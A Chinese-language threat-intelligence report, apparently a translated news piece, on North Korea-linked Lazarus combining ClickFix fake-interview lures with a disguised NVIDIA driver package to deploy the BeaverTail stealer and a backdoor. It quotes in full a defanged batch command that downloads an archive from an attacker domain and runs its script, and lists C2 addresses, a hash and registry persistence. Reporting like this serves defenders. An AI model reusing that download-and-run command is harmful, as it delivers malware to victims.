臭名昭著的 Lazarus APT 组织通过结合日益流行的 ClickFix 社会工程技术来分发恶意软件并从目标组织窃取敏感情报数据，从而改进了其攻击方法。

这个与朝鲜有联系的威胁行为者被安全研究人员内部追踪为 APT-Q-1，通过将欺骗性用户界面纵与其传统间谍活动相结合，表现出了卓越的适应性。

ClickFix 技术代表了一种复杂的社会工程方法，攻击者向受害者提出捏造的技术问题，然后引导他们完成看似合法的“修复”，实际上执行恶意代码。

Lazarus 在其已建立的虚假招聘活动基础设施中将这种方法武器化，创建了一种多层攻击媒介，将工作机会诱饵与技术欺骗相结合。

CN-SEC 分析师通过发现一个恶意批处理脚本来识别这一活动，该脚本下载伪装的 NVIDIA 软件包，随后部署了该组织的标志性 BeaverTail 信息窃取程序。

当受害者被引诱到欺诈性面试网站时，攻击链就开始了，这些网站提示他们准备面试环境，最终声称相机配置问题需要立即解决。

该作的技术复杂性超出了简单的社会工程。受害者会看到看似合法的 NVIDIA 驱动程序更新命令，但底层有效负载会演变成恶意执行序列。

主要感染媒介利用 PowerShell 命令从受感染的基础设施下载并提取恶意 ZIP 存档。

最近的分析显示，该组织已将业务扩展到针对 Windows 和 macOS 平台，通过针对不同作系统架构量身定制的有效负载展示跨平台功能。

Windows 版本通过基于 Node.js 的部署机制专注于企业环境，而 macOS 版本则利用专为 Apple Silicon 和 Intel 处理器设计的 shell 脚本。

恶意软件部署和持久性机制

核心恶意软件包，以“nvidiaRelease[.]zip“（MD5：f9e18687a38e968811b93351e9fca089）包含多个专为跨平台兼容性和持久访问而设计的组件。

初始ClickFix-1.bat脚本执行以下命令序列：-

curl - k - o "%TEMP%\\nvidiaRelease[.]zip" https[:]//driverservices[.]store/visiodrive/nvidiaRelease[.]zip && powershell - Command "Expand-Archive - Force - Path '%TEMP%\\nvidiaRelease[.]zip' - DestinationPath '%TEMP%\\nvidiaRelease'" && cscript "%TEMP%\\nvidiaRelease\\run[.]vbs"

解压的存档部署 run[.]vbs，它执行系统侦察以确定 Windows 内部版本号。

对于 Windows 11 系统（内部版本 22000 或更高版本），该脚本还会执行 drvUpdate[.]exe，一个能够执行命令和文件作的复杂后门。

该二进制文件与 103.231.75.101：8888 的命令和控制服务器建立通信，实现系统信息收集、远程命令执行和文件传输功能等功能。

核心恶意软件组件：-

该恶意软件通过注册表修改实现持久性，向 Windows 启动注册表项添加一个条目，以确保在系统重新启动时执行。

BeaverTail 组件通过 45.159.248.110 与基础设施通信，展示了冗余命令和控制功能，用于维持对受感染系统的长期访问。